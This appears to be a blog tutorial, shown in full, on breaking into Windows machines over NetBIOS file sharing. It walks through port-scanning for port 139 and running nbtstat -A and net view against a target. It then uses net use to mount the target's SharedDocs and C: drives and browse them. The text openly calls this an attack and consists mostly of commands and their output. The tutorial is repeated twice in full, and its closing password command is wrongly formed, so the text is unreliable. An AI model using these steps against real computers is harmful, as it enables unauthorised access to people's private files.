NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
If your results look like that then you're set...
2. nbtstat
To get the info you need for the attack we use a program called nbtstat:
Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.
Code:
c:\>nbtstat -A 127.0.0.1
Use -A if you're using IP addresses. If you're going to use hostnames use -a.
This will give you what is called a nametable:
Code:
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)
Now, the line
Code:
computername <20> UNIQUE Registered is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress
Code:
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
That's the result you should get (it wil be different on a non-WinXP box ).
Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name
Code:
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:
Code:
c:\>cd g:
g:\>
In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:
Code:
c:\>net use /delete g:
g: was deleted successfully.
Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:
Code:
net use password \\ip\sharename
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
If your results look like that then you're set...
2. nbtstat
To get the info you need for the attack we use a program called nbtstat:
Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.
Code:
c:\>nbtstat -A 127.0.0.1
Use -A if you're using IP addresses. If you're going to use hostnames use -a.
This will give you what is called a nametable:
Code:
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)
Now, the line
Code:
computername <20> UNIQUE Registered is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress
Code:
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
That's the result you should get (it wil be different on a non-WinXP box ).
Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name
Code:
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:
Code:
c:\>cd g:
g:\>
In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:
Code:
c:\>net use /delete g:
g: was deleted successfully.
Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:
Code:
net use password \\ip\sharename
No comments:
Post a Comment